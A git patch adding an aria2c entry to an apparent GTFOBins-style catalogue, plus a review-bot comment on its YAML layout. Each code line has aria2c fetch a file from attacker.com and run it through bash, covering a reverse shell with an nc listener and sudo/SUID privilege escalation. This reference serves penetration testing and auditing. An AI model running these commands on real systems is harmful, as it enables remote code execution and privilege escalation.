From 214f7786c0451c3a160a4e35343e5af66ab58a9b Mon Sep 17 00:00:00 2001
From: HugoDelval
Date: Fri, 7 Sep 2018 11:53:15 +0200
Subject: [PATCH] Add aria2c
Taken from https://github.com/InsecurityAsso/inshack-2018/blob/master/web/curler/exploit/exploit
---
_gtfobins/aria2c.md | 13 +++++++++++++
1 file changed, 13 insertions(+)
create mode 100644 _gtfobins/aria2c.md
diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
new file mode 100644
index 0000000..1548e08
--- /dev/null
+++ b/_gtfobins/aria2c.md
@@ -0,0 +1,13 @@
+---
+functions:
+ execute-interactive:
+ - description: "By default the ``--on-download-complete`` option execute a given binary with 3 parameters: https://aria2.github.io/manual/en/html/aria2c.html?highlight=download%20complete#event-hook We can control the first one (GID) which leads to a command execution"
+ - code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains a shell script"
+ reverse-shell-interactive:
+ - description: Run ``nc -lvp 12345`` on the attacker box to receive the shell.
+ - code: "aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa # aaaaaaaaaaaaaaaa file contains the reverse shell payload (in bash)"
+ suid-enabled:
+ - code: "./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
+ sudo-enabled:
+ - code: "sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
+---
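Review bot: Under `execute-interactive` and `reverse-shell-interactive`, `- description:` and `- code:` each start with their own dash, so they parse as two separate sequence items rather than one example carrying both keys. If the site template reads `description` and `code` from the same item (inferred, the template is not part of this patch), the second dash should go so that `code:` becomes a sibling key, i.e. `- description: "..."` followed by an indented `code: "..."`. The text after `#` inside the quoted `code` strings is part of the command value, and that explanation of what the downloaded file holds would read better in `description`. The `suid-enabled` and `sudo-enabled` entries have no description at all; one sentence stating that the hook command is started by aria2c once the download finishes would let a reader auditing sudoers rules or SUID bits see why the binary is listed. `attacker.com` is a registrable domain, so a reserved documentation name such as `attacker.example` is safer in sample commands.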